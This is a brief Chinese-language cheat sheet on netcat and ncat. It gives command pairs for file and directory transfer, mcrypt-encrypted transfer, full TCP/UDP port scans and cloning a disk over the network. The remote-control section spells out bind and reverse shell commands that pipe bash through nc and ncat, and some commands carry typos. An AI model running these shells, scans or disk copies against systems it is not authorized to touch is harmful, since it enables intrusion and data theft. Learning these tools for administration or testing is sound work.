NC与NCat

NC的一些功能

侦听模式 / 传输模式

telnet / 获取banner信息

传输文本信息

传输文件/目录

加密传输文文件

远程控制/木马

加密所有流量

流媒体服务器

远程克隆硬盘

传输文件

A: nc -lp 333 > 1.mp4

B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1

或

A: nc - q 1 -lp 333 < a.mp4

B: nc -nv 1.1.1.1 333 > 2．mp4

传输目录

A ： tar -cvf - music/ | nc -lp 333 —q 1

B ： nc-nv 1.1.1.1 333 | tar -xvf-

加密传输文件

命令用到的参数有，--flush 立即冲洗输出，-F 输出数据，-b 不保留算法信息，-q 关闭一些非严重的警告，-d 解密

A ： nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

B : mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333-q 1

扫描端口

nc -nvz 1.1.1.1 1-65535

所有端口全扫一遍，默认探测TCP端口

nc -nvzu 1.1.1.1 1-65535

所有端口全扫一遍，默认探测UDP端口， 1-65535表示扫面端口的范围

远程克隆硬盘

A： nc -lp 333 | dd of=/dev/sdaB: ddif=/dev/sda | nc -nv 1.1.1.1 333 -q 1

远程控制

方法一：在服务器端：nc -lp 333（打开的端口）

在客户端：nc -nv （服务器IP） 333 -c bash

将客户端的bash传给了服务器

方法二：在服务器端：nc -lp 333（打开的端口）-c bash

在客户端：nc -nv （服务器IP） 333

将服务器端的bash传给了客户端

NCat

功能：用来弥补NC缺乏加密、身份验证的能力

服务器端侦听333端口：

Ncat -c bash --allow 192.168.1.119(IP) -nvl 333 --ssl

（身份验证）允许此IP来连接我使用ssl来加密

客户端：

Ncat -nv 192.168.1.115 333 --ssl